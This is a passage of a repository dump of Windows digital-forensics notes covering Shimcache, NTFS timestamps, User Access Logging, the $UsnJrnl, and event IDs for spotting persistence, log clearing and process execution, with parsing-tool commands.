for SRUDB.dat and SOFTWARE files in the specified directory. 103 | SrumECmd.exe -d --csv 104 | ``` 105 | 106 | -------------------------------------------------------------------------------- 107 | 108 | ### References 109 | 110 | https://isc.sans.edu/forums/diary/System+Resource+Utilization+Monitor/21927/ 111 | 112 | https://www.youtube.com/watch?v=Uw8n4_o-ETM 113 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/Shimcache.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - Application Compatibility Cache (Shimcache) 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | - Files:
8 | `%WinDir%\System32\config\SYSTEM` 9 | 10 | - Registry keys: 11 | 12 | - `>= Windows Server 2003` and `Windows XP 64-bit`
13 | `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache` 14 | 15 | - `Windows XP 32-bit`
16 | `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatibility\AppCompatCache` 17 | 18 | Yield information related to **programs execution**, for Windows operating 19 | systems before the Windows 10 / Windows Server 2016 operating systems. 20 | 21 | The `Application Compatibility Cache`, also known as `Shimcache`, was 22 | introduced in `Windows XP` as part of the `Application Compatibility 23 | Infrastructure (Shim Infrastructure)` feature. The `Shim Infrastructure` is 24 | designed to identify application compatibility issues and maintain support of 25 | existing software to new versions of the `Windows` operating system. As stated 26 | in the Microsoft documentation, the `Shim Infrastructure` "implements a form of 27 | application programming interface (API) hooking" in order to redirect API calls 28 | made by an application to an alternative library containing stub functions, 29 | known as the `Shim`. The process of making an application compatible to a new 30 | version of Windows through `Shims` is referred to as "`shimming`". 31 | 32 | As a part of this framework, the `Application Compatibility Database` 33 | references the applications that have known `shimming` solutions. Upon 34 | execution of an application, the `Shim Engine` will query this database to 35 | determine whether the applications require `shimming`. The `Shimcache` contains 36 | metadata about the files that have been subject to such lookup, for 37 | optimizing and improve the speed of eventual later lookups. 38 | 39 | A `Shimcache` entry is created whenever a program is executed from a specific 40 | path. However, starting from the `Windows Vista` and `Windows Server 2008` 41 | operating systems, entries may also be created for files in a directory that is 42 | accessed interactively. Indeed, browsing a directory using `explorer.exe` will 43 | generate `Shimcache` entries for the executables stored within the directory 44 | (if the executable was visible in the `Windows Explorer` windows). 45 | 46 | **`Shimcache` entries are only written to the registry upon shutdown of the 47 | system. The `Shimcache` entries generated since the last system boot are 48 | thus only stored in memory.** 49 | 50 | While the `Shimcache` entry is not removed upon deletion of the associated 51 | file, `Shimcache` entries may be overwritten and information lost as the oldest 52 | entries are replaced by new data. A maximum of 96 `Shimcache` entries are 53 | stored in `Windows XP` / `Windows Server 2003` and up to 1024 entries starting 54 | can be stored starting from the `Windows Vista` and `Windows Server 2008` 55 | operating systems. 56 | 57 | ### Information of interest 58 | 59 | Each `Shimcache` entries contain the following information, varying depending 60 | on the version of the Windows operating system in use: 61 | 62 | - The associated **file full path**. 63 | 64 | - On `Windows 2003 and XP 64-bit` and older, **the file size**. 65 | 66 | - The **`LastModifiedTime` (`$Standard_Information`) timestamp of the file**, 67 | which **does not necessarily reflect the execution time**. Indeed, 68 | `Shimcache` entries are not directly associated with an insert / executed 69 | timestamp. 70 | 71 | - The cache entry position, as a numerical value starting from 0, which 72 | represents the insertion position in the `Shimcache`. 73 | **The lower the value, the more recently the program was shimmed.** 74 | 75 | - From `Windows Vista` / `Windows Server 2008` up to `Windows 8.1` / 76 | `Windows Server 2012 R2`, the (undocumented) `Insert Flag` flag which, when 77 | set, seems to indicate that the entry was executed. This flag is no 78 | longer present starting from Windows 10 / Windows Server 2016, and thus a 79 | `Shimcache` entry does not necessarily reflect an execution** (as entries 80 | may also be created for files in a directory that is accessed 81 | interactively). 82 | 83 | - On `Windows XP 32-bit`, the file `Last Update Time` timestamp. 84 | 85 | ### Parsing 86 | 87 | ###### Entries stored on disk 88 | 89 | Eric Zimmerman's `AppCompatCacheParser.exe` tool (`KAPE`'s 90 | `'AppCompatCacheParser` module) and the `ShimCacheParser.py` Python script 91 | can be used to parse `Shimcache` entries. 92 | 93 | By default, both tools will parse all the `ControlSet` found in the `SYSTEM` 94 | hive. 95 | 96 | ``` 97 | # Parses the live system Registry. 98 | AppCompatCacheParser.exe --csv 99 | python ShimCacheParser.py --local -o 100 | 101 | # Parses the specified SYSTEM hive. 102 | # --nl: option to force the parsing of the hive even if the even is in a "dirty" state and no transaction logs are available. 103 | AppCompatCacheParser.exe [--nl] -f --csv 104 | 105 | python ShimCacheParser.py [--hive | --reg ] -o 106 | ``` 107 | 108 | ###### Entries only present in memory 109 | 110 | The `Volatility2`'s `shimcache` plugin can be used to extract the `Shimcache` 111 | entries living in memory (generated since the last system boot). 112 | 113 | For more information on how to capture memory and use `Volatility` for memory 114 | analysis, refer to the `[DFIR] Memory` note. 115 | 116 | ``` 117 | vol.py -f win7.vmem --profile=Win7SP1x86 shimcache 118 | ``` 119 | 120 | -------------------------------------------------------------------------------- 121 | 122 | ### References 123 | 124 | https://www.fireeye.com/content/dam/fireeye-www/services/freeware/shimcache-whitepaper.pdf 125 | https://www.fireeye.com/blog/threat-research/2015/06/caching_out_the_val.html 126 | http://www.alex-ionescu.com/?p=39 127 | https://docs.microsoft.com/en-us/windows/win32/devnotes/application-compatibility-database 128 | https://lifars.com/wp-content/uploads/2017/03/Technical_tool_Amcache_Shimcache.pdf 129 | https://github.com/mandiant/ShimCacheParser 130 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/Timestamps.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows timestamps 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### NTFS $STANDARD_INFORMATION & $FILENAME MACB timestamps 6 | 7 | On `NTFS` filesystems, each file posses (at least) two attributes that hold 8 | (among other information) `Modification, Access, Change and Birth (MACB)` 9 | timestamps: 10 | - `$STANDARD_INFORMATION` 11 | - `$FILENAME` 12 | 13 | The impact of a number of operations on each timestamps for the 14 | `$STANDARD_INFORMATION` and `$FILENAME` attributes are detailed in the 15 | [SANS's `Windows Time Rules` poster](https://www.sans.org/security-resources/posters/windows-forensic-analysis/170/download). 16 | Globally, the following points should be noted: 17 | 18 | - `$FILENAME` `MACB` timestamps are updated on file creation / copy / volume 19 | move with the date of the operation itself but are not reliability updated 20 | on regular file operations (access, modification, rename, deletion). 21 | **However as the `$FILENAME` `MAB` timestamps are updated / copied from the 22 | `$STANDARD_INFORMATION` `MAB` timestamps on file rename or volume-local 23 | file move, they are prone to false-negatives.** Indeed, by timestomping the 24 | `$STANDARD_INFORMATION` timestamps then renaming or moving the file, the 25 | `$FILENAME` timestamps will be indirectly timestomped as well. 26 | 27 | - On file copy (between two `NTFS` partitions): the `$STANDARD_INFORMATION` 28 | `MC` timestamps are inherited from the original file but the 29 | `$STANDARD_INFORMATION` `AB` timestamps (and the `$FILENAME` `MACB` 30 | timestamps) are the ones of the copy itself. 31 | 32 | - On local file moves (on the same `NTFS` partition), the 33 | `$STANDARD_INFORMATION` `C` `$FILENAME` `C` timestamps are updated with the 34 | timestamp of the move). On file moves (between `NTFS` partitions), the 35 | `$STANDARD_INFORMATION` `AC` timestamps are updated, also with the 36 | timestamp of the move. 37 | 38 | - The update of the `$STANDARD_INFORMATION` `A` timestamp is unreliable and 39 | depends on the value of the 40 | `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate` 41 | registry key. The following values may be encountered: 42 | 43 | - `0` (default on Windows XP), `80000000` (User managed), `80000002` 44 | (System managed) means that last access updates are enabled. Starting 45 | from `Windows Redstone 4` (`Build 1803` of 04/2018), last access 46 | updates seem to be enabled (back) by default if the system partition 47 | size is <= to 128 GiB. Starting from `Windows 10 20H1` (`Build 18970` 48 | of 05/2020) last access updates seem to be enabled by default 49 | independently of the system partition size. 50 | 51 | - `1` (default from Windows Vista to early Windows 10 versions), 52 | `80000001` (User managed), `80000003` means that last access updates 53 | are disabled. 54 | 55 | Depending on its filename length, a given file may have one or two `$FILENAME` 56 | attributes: 57 | 58 | - file with short name will have a single `$FILENAME` attribute. 59 | 60 | - file with long name will be associated to two `$FILENAME` attributes, 61 | one for the long file name and a second for the MS-DOS-compatible short 62 | file name (`FILENA~1.TXT` for example). 63 | 64 | Additionally, another `$FILENAME` attribute can be found for each file in the 65 | directory index of their directory of residency. Indeed directory are stored 66 | on `NTFS` partitions as `B+ tree data structure` with the keys, representing 67 | files and subdirectories, stored as `$FILENAME` attributes. `MACB` timestamps 68 | for each files and subdirectories of a given directory can thus be found in the 69 | directory index. The directory index are stored in `NTFS Index Attribute` 70 | files, also known as `INDX` files and named `$I30` on disk. 71 | 72 | A given file may thus be associated with either: 73 | 74 | - **12 timestamps**: `$STANDARD_INFORMATION` + `$FILENAME` + `NTFS $I30`'s 75 | `$FILENAME`. 76 | 77 | - **20 timestamps**: `$STANDARD_INFORMATION` + 2 * `$FILENAME` + 78 | 2 * `NTFS $I30`'s `$FILENAME` (duplicate timestamps for files with long 79 | name). 80 | 81 | ### Registry last write timestamps 82 | 83 | The last write / modified timestamp of a registry key correspond to the last 84 | time a write operation occurred on the key. Multiple types of write operation 85 | may trigger an update of the last write / modified timestamp of the key: 86 | 87 | - Addition / modification / deletion of one (or multiple) values under the 88 | key. 89 | 90 | - Addition / deletion of a sub-key under the key. 91 | 92 | - Change in the security descriptor (including `Access Control List (ACL)`) 93 | of the key. 94 | 95 | The last write / modified timestamp of a registry key is the only generic 96 | timestamp available regarding registry keys. 97 | 98 | ### Convert UNIX time to human readable format 99 | 100 | Timestamps in Windows are often stored as `UNIX time`: 32-bit value containing 101 | the number of seconds elapsed since 1/1/1970. 102 | 103 | Note that Active Directory generally store time values of objects (stored in 104 | each object's attributes) in `Greenwich Mean Time (GMT)`. 105 | 106 | The following one-liners can be used to convert an `UNIX time` to an human 107 | readable format: 108 | 109 | ``` 110 | # Display both the time in GMT and in the local time zone of the system. 111 | w32tm.exe /ntte 112 | ``` 113 | 114 | -------------------------------------------------------------------------------- 115 | 116 | ### References 117 | 118 | https://www.sans.org/security-resources/posters/windows-forensic-analysis/170/download 119 | 120 | https://forensicswiki.xyz/wiki/index.php?title=MAC_times 121 | 122 | https://dfir.ru/2018/12/08/the-last-access-updates-are-almost-back/amp/ 123 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/User_Access_Logging.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - User Access Logging artefacts 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | Location: `%SystemRoot%\System32\Logfiles\SUM\` folder. 8 | 9 | Yield Information related to **user access and activity**.
10 | On Domain Controllers, yield information on **sessions opening on domain-joined 11 | computers** (if the given DC was reached for authentication / `Group Policy` 12 | retrieval). 13 | 14 | `User Access Logging (UAL)` is a feature introduced, and enabled by default, in 15 | `Windows Server 2012` that consolidates data on client activity. Among other 16 | information, user access on specific Windows Server roles (such as 17 | `Active Directory Domain Services` on Domain Controller) are logged by the 18 | `UAL`. The specific activity triggering an entry to be logged for a given role 19 | is not documented. 20 | 21 | The information is stored locally in up to five 22 | `Extensible Storage Engine (ESE)` database files (`.mdb`): 23 | - `Current.mdb` which contains data for the last 24-hour. 24 | - Up to three `.mdb` files, which contain data for an entire year 25 | (first to last day), going back to 2 years. The data in the `Current.mdb` 26 | database is copied each day to the corresponding (`.mdb`) database 27 | for the current year. 28 | - `Systemidentity.mdb` which contains metadata on the local server, including 29 | a mapping on roles' GUIDs and names. 30 | 31 | Historical data going back to 2 years (2020 as of 2022) may thus be retrieved 32 | in the `UAL` database files. 33 | 34 | ### Information of interest 35 | 36 | The `CLIENTS` table of the aforementioned database files contain multiple 37 | information of interest: 38 | - Accessed Windows Server role `GUID` and description. Among others, the 39 | following roles can be encountered: 40 | - `Active Directory Domain Services` (GUID: 41 | `ad495fc3-0eaa-413d-ba7d-8b13fa7ec598`). 42 | - `File Server` (GUID: `10a9226f-50ee-49d8-a393-9a501d47ce04`). 43 | - `Active Directory Certificate Services` (GUID: 44 | `c50fcc83-bc8d-4df5-8a3d-89d7f80f074b`). 45 | 46 | - The client domain and username. 47 | 48 | - Total number of access. 49 | 50 | - First, last, and daily access timestamps. 51 | 52 | - Client `IPv4` or `IPv6` address. On Domain Controllers, the hostname 53 | associated the `IP` address at that time may be retrievable as machine 54 | accounts of domain-joined computers also authenticate on `AD DS`. 55 | 56 | Each entry in the `CLIENTS` table is composed of a unique set of a Windows 57 | Server role, a client's domain / username, and a source `IP` address. 58 | 59 | The `DNS` table of the aforementioned database files contain information about 60 | `DNS` resolutions: hostname, associated `IP` address, and timestamp of last 61 | resolution. 62 | 63 | ### Parsing 64 | 65 | ###### Live forensics 66 | 67 | The PowerShell cmdlets of the `UserAccessLogging` module can be used to 68 | retrieve `UAL` data on a live system: 69 | 70 | ```bash 71 | # Enumerates the roles installed on the system. 72 | Get-UalOverview 73 | 74 | # Retrieves UAL data for user access (data stored in the CLIENTS table). 75 | Get-UalUserAccess 76 | 77 | # Retrieves UAL data for client access by device for a given service, ordered by date (data stored in the CLIENTS table). 78 | # The cmdlets returns the date that the client accessed the service and how many times the client accessed the service during that day. 79 | Get-UalDailyAccess 80 | 81 | # Retrieves information on DNS resolutions (data stored in the DNS table). 82 | Get-UalDns 83 | ``` 84 | 85 | ###### Triaged UAL database files 86 | 87 | A direct copy of the `UAL` database files is not possible as the files are 88 | being locked due to continued access. The files should be copied through a 89 | `shadow copy` volume or using utilities implementing raw disk reads (such as 90 | [`Velociraptor`](https://github.com/Velocidex/velociraptor) or 91 | [`RawCopy`](https://github.com/jschicht/RawCopy)). 92 | 93 | ```bash 94 | # Example of low level file copy bypassing file locking using RawCopy. 95 | RawCopy64.exe /FileNamePath:"" /OutputPath:"" 96 | ``` 97 | 98 | As the databases copied will not be in a "clean state", the database files will 99 | have to be repaired. This can be accomplished using the `esentutl` utility: 100 | 101 | ``` 102 | # The following commands should be executed in the directory containing the UAL database files. 103 | 104 | esentutl.exe /r sru /i 105 | 106 | esentutl.exe /p 107 | ``` 108 | 109 | The Eric Zimmerman's `SumECmd.exe` tool or 110 | the [`KStrike`](https://github.com/brimorlabs/KStrike) Python script can be 111 | used to parse `UAL` database files: 112 | 113 | ```bash 114 | # Parses the specified individual UAL database file. 115 | KStrike.py 116 | 117 | # Parses the UAL database files (Current.mdb, SystemIdentity.mdb, etc.) in the specified directory. 118 | # The results will be aggregated in single CSV files per category (client access, DNS requests, etc.). 119 | SumECmd.exe --csv -d 120 | ``` 121 | 122 | -------------------------------------------------------------------------------- 123 | 124 | ### References 125 | 126 | https://advisory.kpmg.us/blog/2021/digital-forensics-incident-response.html 127 | 128 | https://www.youtube.com/watch?v=rVHKXUXhhWA 129 | 130 | https://docs.microsoft.com/en-us/windows-server/administration/user-access-logging/get-started-with-user-access-logging 131 | 132 | https://www.crowdstrike.com/blog/user-access-logging-ual-overview/ 133 | -------------------------------------------------------------------------------- /DFIR/Windows/Artefacts/UsnJrnl.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - $UsnJrnl 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Overview 6 | 7 | The `Update Sequence Number Journal (USN) Journal` is a feature of NTFS, 8 | activated by default on Vista and later, which maintains a record of changes 9 | made to the NTFS volume. The creation, deletion or modification of files or 10 | directories are for instance journalized. 11 | 12 | Similarly to the `MFT`, entries for deleted files are progressively overwritten 13 | in the `UsnJrnl`. 14 | 15 | The journal is located in `\$Extend\$UsnJrnl` (`$Max` and `$J` data streams) 16 | but can not be accessed through the Windows explorer as it is a system file. 17 | 18 | The journal is composed of the `$Max` and `$J` data streams. The `$Max` data 19 | stream stores the meta data of the change and the `$J` data stream stores the 20 | actual change log records. 21 | 22 | The change log records are notably composed of: 23 | - an `Update Sequence Number (USN)` 24 | - the timestamp of the change 25 | - the reason the record was logged (`USN_REASON_FILE_CREATE`, 26 | `USN_REASON_FILE_DELETE`, `USN_REASON_DATA_OVERWRITE`, 27 | `USN_REASON_RENAME_NEW_NAME`, etc.) 28 | - MFT reference and reference sequence number 29 | 30 | ### UsnJrnl metadata 31 | 32 | The Windows `fsutil` and the PowerShell cmdlet `Get-ForensicUsnJrnlInformation` 33 | of the `PowerForensics` suite can be used to retrieve metadata about the 34 | `UsnJrnl`: 35 | 36 | ``` 37 | # First and current USN, maximum size notably 38 | fsutil usn queryjournal 39 | 40 | Get-ForensicUsnJrnlInformation 41 | Get-ForensicUsnJrnlInformation -VolumeName 42 | Get-ForensicUsnJrnlInformation -Path 43 | ``` 44 | 45 | ### UsnJrnl extraction and parsing 46 | 47 | ###### MFTECmd 48 | 49 | The `MFTECmd` utility can parse and extract information from the 50 | `UsnJrnl`'s `$J` stream (as well as other filesystem artefacts such as the 51 | `$MFT`, the file ownership `$Secure:$SDS` data stream, and the transaction log 52 | file `$Logfile`). 53 | 54 | ```bash 55 | # A UsnJrnl's $J file on a mounted partition should be specified. 56 | # For instance, to extract UsnJrnl's $J data from a forensics image, the image should first be mounted and the UsnJrnl's $J file specified as :\$Extend\$J to MFTECmd.exe. 57 | 58 | MFTECmd.exe -f '' --csv 59 | ``` 60 | 61 | ###### ExtractUsnJrnl / UsnJrnl2Csv 62 | 63 | The `ExtractUsnJrnl.exe` with `UsnJrnl2Csv.exe` utilities as well as the 64 | PowerShell cmdlet `Get-ForensicFileRecord` of the `PowerForensics` suite can be 65 | used to parse and extract information from the `UsnJrnl`. The tools below do 66 | not support the `UsnJrnl`'s `USN_RECORD_V4` format yet. 67 | 68 | ``` 69 | ExtractUsnJrnl64.exe /DevicePath: [/OutputPath: | /OutputName:] 70 | ExtractUsnJrnl64.exe /ImageFile: [/OutputPath: | /OutputName:] 71 | 72 | # Starts the UsnJrnl2Csv GUI 73 | UsnJrnl2Csv64.exe 74 | UsnJrnl2Csv64.exe /UsnJrnlFile: /OutputPath: /TimeZone:"<-12.00 ... 14.00>" /Separator:"" 75 | 76 | # May not work properly on newer Windows operating systems 77 | Get-ForensicUsnJrnl 78 | Get-ForensicUsnJrnl -VolumeName 79 | Get-ForensicUsnJrnl -Path 80 | ``` 81 | 82 | -------------------------------------------------------------------------------- 83 | 84 | ### References 85 | 86 | http://forensicinsight.org/wp-content/uploads/2013/07/F-INSIGHT-Advanced-UsnJrnl-Forensics-English.pdf 87 | https://countuponsecurity.com/2017/05/25/digital-forensics-ntfs-change-journal/ 88 | -------------------------------------------------------------------------------- /DFIR/Windows/README.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows 2 | -------------------------------------------------------------------------------- /DFIR/Windows/TTPs_Analysis/ActiveDirectory_persistence.md: -------------------------------------------------------------------------------- 1 | # DFIR - Active Directory persistence 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/). This note is however not presently integrated to `artefacts.help`.** 4 | 5 | ### Active Directory persistence detection through events logs 6 | 7 | TODO 8 | 9 | The following events could be indicator of persistence on the system: 10 | 11 | | Hive | Event ID | Description | 12 | |----------|----------|-------------| 13 | | Security | 4720 | `A user account was created`. Logged both for local SAM accounts and domain accounts and includes the creator SID, domain, username and `Logon ID`. | 14 | | Security | 4722 | `A user account enabled`, logged both for local SAM accounts and domain accounts and is always logged after a Security event `4720 - user account creation`. | 15 | | Security | 4723 | `An attempt was made to change an account's password`. Logged both for local SAM accounts and domain accounts when an user attempts to change his/her own password. This event is logged only if the user entered his/her correct password and reported as a failure if his/her new password fails to meet the password policy. Includes the SID, domain, username and `Logon ID` of the user that performed the password change. | 16 | | Security | 4724 | `An attempt was made to reset an accounts password`. Logged both for local SAM accounts and domain accounts when an user attempts to change another user password. This event is logged only if the user correct password is specified, the user attempting the password reset as the necessary permissions to do so, and reported as a failure if his/her new password fails to meet the password policy. Includes the SID, domain, username and `Logon ID` of the user that performed the password change. | 17 | | Security | 4670 | `Permissions on an object were changed`. This event generates when the permissions for an object are changed 18 | | Security | 4738 | `A user account was changed`. Logged both for local SAM accounts and domain accounts when an user object attributes are modified. The old and new value for the updated attribute is logged. If all attributes are marked as "-", an update on a attribute that is not listed in the event log or a modification on the user DACL object has occurred. The `AD - Exploiting DACL` note can be consulted for more information on exploitable DACL on user principal object.
In addition to a potential modification on the user object DACL, this event can be used to detect the following persistence means:
- addition of SID in the `SID History` of an user
- disabling of Kerberos `Require Preauth` to make the account vulnerable to `ASREPRoast`.
| 19 | | Security | 4732 | `A member was added to a security-enabled local group`. Logged on domain controllers for Active Directory domain local groups and member computer for local SAM groups. | 20 | | System | 7030 | `Basic Service Operations`. Occurs when a service is configured as an interactive, which is not supported since Windows Vista and Windows Server 2008 (du to security risks posed by interactive services). | 21 | | System | 7045,4697 | `A service was installed in the system`. | 22 | | System | 7035, 7036 | `The service was successfully sent a control.` and `The service entered the state.` A run / stop signal is sent then the service is effectively started / stopped. | 23 | | Security | 4697 | `A service was installed in the system` from Windows Server 2016 and Windows 10 | 24 | | System | 7040 | Service start type was changed | 25 | | System | 1056 | DHCP server oddities | 26 | | Security | 4688 | `A new process has been created`. Occurs when a process is created and include information about the process: creator subject (SID, account domain and name as well as the Logon ID), creator PID, token elevation type. etc. If enabled, the "process command line" field include the command line of the process. | 27 | 28 | 29 | TODO 4670 and 4662 and 4728 and 4732 and 4756 30 | 31 | Windows Security Log Event ID 4657: A registry value was modified 32 | this event will only be logged if the key's audit policy is enabled for Set Value permission for the appropriate user or a group in the user is a member. 33 | 34 | -------------------------------------------------------------------------------- 35 | 36 | ### References 37 | 38 | https://social.technet.microsoft.com/wiki/contents/articles/51185.active-directory-replication-metadata.aspx#:~:text=Replication%20Metadata%20is%20the%20data,in%20Active%20Directory%20(AD) 39 | https://www.harmj0y.net/blog/defense/hunting-with-active-directory-replication-metadata/ 40 | https://social.technet.microsoft.com/wiki/contents/articles/25946.metadata-de-replication-et-analyse-forensic-active-directory-fr-fr.aspx 41 | https://www.ssi.gouv.fr/uploads/2019/04/ad_timeline_first_tc.pdf 42 | -------------------------------------------------------------------------------- /DFIR/Windows/TTPs_Analysis/EVTX_integrity.md: -------------------------------------------------------------------------------- 1 | ###### Logs integrity 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | The following events occurs whenever the associated logs are cleared: 6 | 7 | - Event: `1102: The audit log was cleared`.
8 | Location: victim `Security` hive. 9 | Includes the SID, domain, username and `Logon ID` of the user that cleared 10 | the logs. 11 | 12 | - Event: `104: The System log file was cleared`.
13 | Location: victim `System` hive. 14 | Includes the domain and username of the user that cleared the logs. 15 | 16 | Additionally, every event of a given event log hive has an `EventRecordID` 17 | field representing an index number, sequentially incremented, of the event in 18 | that particular hive. Any disparity in record ids may reflect a deletion of 19 | event(s) in the hive. 20 | -------------------------------------------------------------------------------- /DFIR/Windows/TTPs_Analysis/Program_execution.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - Program execution 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### Security.evtx - 4688: A new process has been created 6 | 7 | Event: `4688: A new process has been created`.
8 | Location: victim `Security` hive.
9 | Requires `Audit Process Creation` to be enabled. 10 | 11 | This event is logged upon the creation of every new process on the system. 12 | 13 | The `NewProcessName` field stores the full path of the process's executable and 14 | the `ProcessId` field the `Process ID (PID)` of the process. The 15 | `ParentProcessName` field logs the parent process's executable full path and 16 | can be used to identity suspicious processes activity, such as `outlook.exe` or 17 | `iexplorer.exe` starting `cmd.exe` or `powershell.exe` processes. 18 | 19 | This event includes the SID `SubjectUserSid`, account name `SubjectUserName`, 20 | and domain `SubjectDomainName` of the user creating the process. Additionally, 21 | the `SubjectLogonId` field can be used to correlate the process creation with 22 | the logon session, event `EID: 4624`. 23 | 24 | The `TokenElevationType` field represent the privileges of the process and can 25 | take the following values: 26 | 27 | | Flag | Correspondence | Description | 28 | |------|----------------|-------------| 29 | | `%%1936` | `TokenElevationTypeDefault` | The process is started with a full token with no privileges removed or groups disabled. A full token is only used if `User Account Control (UAC)` is disabled or if the user starting the process is the built-in `Administrator` (`RID: 500`), `NT AUTHORITY\SYSTEM` or service account. | 30 | | `%%1937` | `TokenElevationTypeFull` | The process is started with an elevated token with no privileges removed or groups disabled. An elevated token is used when `User Account Control (UAC)` is enabled and the user chooses to start the program in a elevated security context (`Run as administrator` for example). | 31 | | `%%1938` | `TokenElevationTypeLimited` | The process is started with limited privileges, and privileged tokens such as `SeImpersonatePrivilege`, `SeDebugPrivilege`, etc. are removed from the process security context. | 32 | 33 | If the `ProcessCreationIncludeCmdLine_Enabled` audit policy is enabled, the 34 | command line specified at the process creation will be logged in the 35 | `ProcessCommandLine` field. 36 | 37 | This event is followed by the `Security` event `4689: Process Termination: 38 | Success and Failure` upon the termination of the process. 39 | 40 | ### Artefacts 41 | 42 | For an overview of the artefacts related to programs execution (`SRUM`, 43 | `UserAssist`, `BAM` / `DAM`, `Shimcache`, `Amcache`, `Prefetch`, ...), refer to 44 | the [artefacts overview note](../Artefacts/_Artefacts_overview.md). 45 | 46 | -------------------------------------------------------------------------------- 47 | 48 | ### References 49 | 50 | https://digital-forensics.sans.org/media/dfir_poster_2014.pdf 51 | https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4688 52 | -------------------------------------------------------------------------------- /DFIR/Windows/TTPs_Analysis/README.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - TTPs analysis 2 | -------------------------------------------------------------------------------- /DFIR/Windows/TTPs_Analysis/System_uptime.md: -------------------------------------------------------------------------------- 1 | # DFIR - Windows - System uptime 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | ### EVTX 6 | 7 | | File | Event source | Description | 8 | |------|------------|-------------| 9 | | `System.evtx` | `User32` | Event `1074: The process has initiated the xxx of computer on behalf of user for the following reason: ` | 10 | | `System.evtx` | `EventLog` | Event `6005: The Event log service was started` | 11 | | `System.evtx` | `EventLog` | Event `6006: The Event log service was stopped` | 12 | | `System.evtx` | `Microsoft-Windows-Kernel-General` | Event `12: The operating system started at system time